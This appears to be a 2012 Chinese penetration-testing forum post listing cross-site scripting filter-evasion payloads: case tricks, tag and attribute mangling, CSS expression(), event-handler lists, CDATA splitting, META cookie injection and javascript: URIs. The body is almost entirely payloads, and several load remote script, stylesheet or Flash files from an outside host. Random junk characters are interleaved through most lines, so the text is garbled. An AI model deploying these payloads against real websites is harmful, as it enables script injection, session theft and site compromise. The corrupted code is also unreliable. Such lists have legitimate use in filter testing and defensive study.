中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写6 m  v8 ^/ l2 F7 |) k) S

. Q; C. @, a' g: e1 H& H0 e
, d3 o( f. Y& }9 @; x
% ?7 T7 d: X) R+ v  U    <sCript>alert(‘d’)</scRipT>
- i  k) Z1 L2 ~6 e" G8 |% _8 ]4 |7 W3 \1 p2 l$ h
2. 利用多加一些其它字符来规避Regular Expression的检查
+ G8 F7 s! ~7 ^4 ~7 E0 p8 ?( Q2 I
3 H! K# l( W9 v1 I% r# P- U    <<script>alert(‘c’)//<</script>% {' `+ m2 c; V9 _* U. G

! }- z( Y* {; Z# j0 D8 e    <SCRIPT a=">" SRC="t.js"></SCRIPT>! k- B  e$ v1 R$ p$ f* d& ^/ Z

8 I, Y4 V: t* ~' z4 i    <SCRIPT =">" SRC="t.js"></SCRIPT>
' m3 e# d7 z' D; ~/ l7 j+ Y+ G; e) ?# Z2 f
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>, l& @3 Z7 n3 b. M: G$ r
+ e8 T( D7 ^- i& v
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
, g8 J0 U1 k% [/ D' M% Z
  a" [, b6 q' k. L" A" k! F2 r    <SCRIPT a=`>` SRC="t.js"></SCRIPT>* c3 g( j. x; j; ?
/ q. U' r- W- P; L4 L: j0 o
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
; K8 h' f' k. \1 T: t+ `: W; R1 A7 p+ d- y" |, {: H4 Y. M$ m% b6 s* e
3. 以其它扩展名取代.js
( g- F. ~& Q. }. B) f% e" H- p6 A" x- f# i# b% i
    <script src="bad.jpg"></script>
" e1 `+ {7 r* d% W* L& v' T$ m
8 \; e) x2 k( u2 o: I5 m% b1 X4. 将Javascript写在CSS档里
0 H& W" K6 P. [; x, ]5 m* Z
( ?; b6 Q0 P0 O2 M    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">. p9 u5 q& l* n8 U( k

3 o9 P" v9 N8 n* p       example:
; @& N, s2 U) `$ }* L% F: k3 g" }
          body {. T; r6 h! {( \* D1 I

( a1 m1 b5 ]% @9 o3 m               background-image: url(‘javascript:alert("XSS");’)
' @: u5 v" ?5 P' |9 ~: Z1 H" Z
+ e* ~- A% j& M          }
  V) i- q. A5 n/ h
0 Z) s  y. q, K, p6 B" Q5. 在script的tag里加入一些其它字符5 L2 c% J/ s9 l6 {5 D. ~
  v) Y, L! K3 X8 o
    <SCRIPT/SRC="t.js"></SCRIPT>- y" o" U5 |2 n; k6 [3 G7 J, y5 k8 a
9 @+ N  z) i) L0 {* d- B
    <SCRIPT/anyword SRC="t.js"></SCRIPT>  B, m; A& u7 x* A9 ^
  W) I: o7 p0 l. B3 J
6. 使用tab或是new line来规避
. ~6 Y# |, g# C- P, g
* o6 W( e+ o8 g$ M( C8 v    <img src="jav ascr ipt:alert(‘XSS3′)">
* m. K9 R: C+ X/ y0 _/ D0 X5 P  p% Y& o& J5 ?+ g9 q0 W5 L0 i
    <img src="jav ascr ipt:alert(‘XSS3′)">
# q' V9 |6 ~  @! a+ s; l+ l+ M1 |
    <IMG SRC="jav ascript:alert(‘XSS’);">
0 u' G0 W5 T' k$ G  o8 r9 t, j
3 U. h; U+ F" l9 d1 }         -> tag( T3 l& |2 r( e8 A* y: x. X5 f

0 B& e: }9 z1 _4 P! V  v% p         -> new line- Q, R, I+ C# B9 r  u9 y

' r+ g- \4 k  V" k( ]& J/ e4 G6 y7. 使用"\"来规避
0 v) t# m# p  D) c
- H% N2 ^$ B+ u2 S4 }! D) _! e    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
  W: y* |0 Q& `; R: J0 Q  O  X! X  J
; X) C, |* o* `" `( c, n$ s    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>  t" e$ |% t4 \
5 k* L" j- n0 M: x1 F  M9 s
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">/ ]& Z1 q9 `  v' E1 k6 n
! S; S+ p8 H4 @/ N
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
; g' ^2 n" q+ L' z/ {1 J6 |" V( n- q: V9 ]1 V, ]8 g- j
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
7 f" Y: _4 U0 l/ X5 P2 @
) m- Z1 D+ r8 R3 H8. 使用Hex encode来规避(也可能会把";"拿掉); o. `  g. i1 n7 I6 Q' S# b$ T
3 p: e/ \; p' d1 |
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
+ j$ A5 b3 J3 I* E
; y3 X. {! o# ?  |+ ^% f% [/ s        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 I; O% Z4 S8 A7 T, Z1 l7 e/ Z; x2 x
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">% K* `' L. J0 n
! a7 c$ @2 d* g
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9 |1 X+ M, J" s' K9 ^) H" ~5 r7 _7 H  H( G" S0 |8 _5 U7 x# P+ `2 L
9. script in HTML tag
2 o+ w/ r  {7 }& ^3 |# o# l" d2 |: _$ a* A" \, p+ h
    <body onload=」alert(‘onload’)」>  k2 A+ w, O" D, `7 q; C
- ~1 }2 ^: a! y1 B0 ^% V2 v
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload$ G7 D' |& ?. F1 Z

8 b' E2 j% ^, }+ Z1 s. T1 T6 W10. 在swf里含有xss的code
; h6 j2 f9 n! \" F
/ T# H1 p0 G0 p$ q4 o    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>% K& m, F" O8 @' s! E1 y
3 I6 @- g2 X0 b: `/ w& w  L
11. 利用CDATA将xss的code拆开,再组合起来。) U& s( _) d# {- {7 `- a: \$ n7 y7 Z' T
, r7 K7 y4 B- k- g9 t
    <XML ID=I><X><C>
: A. {' \# |5 u- ^' s% }+ v- W; B  L6 i4 t
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>1 V# i0 f4 @9 ?( c+ i

+ [3 ~9 I. ?# y- S  |# h7 q0 u7 X    </C></X>
3 J3 q% v7 s& E4 X; y1 C# y* F4 r$ w' ?6 V1 B
    </xml># S/ F1 h2 v4 N! f" ?7 d
/ b3 w8 e; C& R9 ?3 ]$ \3 x/ x2 G
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>; s- X' ]9 ~4 w6 j% C

/ _  O" ?% X1 Q' w- ?) X% H    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
  b" h# j' V1 X/ O% {
& L" X9 p% C4 o1 Q    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
4 S8 k6 g; U9 B( F, y- l. ~5 h& Z. R- _6 Q: ~/ S+ ^3 E
12. 利用HTML+TIME。
# x9 A" p3 M5 U9 G6 F% d4 h4 t! P7 f7 d1 H- ^( U6 I+ n
    <HTML><BODY>
1 d6 [/ p  n& ^: p5 F4 m. ~7 Z8 v4 ^& @* [1 D
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  A9 u7 X& Z" q0 Y& F: l7 x: l/ f" F! V# E9 C
    <?import namespace="t" implementation="#default#time2">$ Z0 d, ]0 G2 n# c

  p+ b* w# }3 S9 ?4 N5 N    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
4 Z5 ^0 P8 D4 ~/ K6 V
/ g2 a  ]- z) E$ C" W# Z- z    </BODY></HTML>
. Q9 C: J. l  i( `5 l, x& R) W7 A  w4 Y$ J) t# y( Q9 x+ d
13. 透过META写入Cookie。
+ L; r& V) l: ^  S6 s' ^" |  B. R* X3 a1 K3 F
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">. Z# S5 R& a+ h# _+ C+ N( e3 {

1 t4 w  x" p  m/ i5 w8 t- ~. m14. javascript in src , href , url, N$ f- u) _+ ^8 H- ~# F9 p( |

, `( \" B+ }% z; f8 C    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
3 K3 Q0 ?# {' K4 Z/ A5 l; P- ^2 ]; C9 j0 R0 c- L9 M7 L; q% b' k
    <img src="javascript:alert(‘XSS3′)">
+ X5 {# c' S+ c) C
  [7 s# g0 m& c, ~0 h. j/ T<IMG DYNSRC="javascript:alert(‘XSS20′)">% x: J, n. `" j* ^* O- v7 x

5 [6 o* Y5 u* e# J) F* V    <IMG LOWSRC="javascript:alert(‘XSS21′)">, J/ J8 f3 w# S+ \# t; A3 z! m& N: C
8 i' z- M* }8 {
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
, x" O# @& J$ p
" b% ?! A) y* n2 U    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
* N& ]" k% D# m4 i2 U) Q! r8 q# a$ w+ \5 v2 q* e
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">. n! t% }$ R/ B% k4 P

: g' M4 `+ L# _) X    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
, _' \- ]" B/ x* w; O  J/ N
7 k# V/ {' Y- V: D    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}0 x: u/ C5 u0 e; A, a; h' m( j) B

" t7 M  g/ b" e) b    </STYLE><A CLASS=XSS></A>% k: O- b8 a2 g
- ?! e! a* Q8 Z* m" s
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>. L+ a: g# b$ F9 q" B' g5 L: [3 z2 }
; P- A. `1 E' b




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2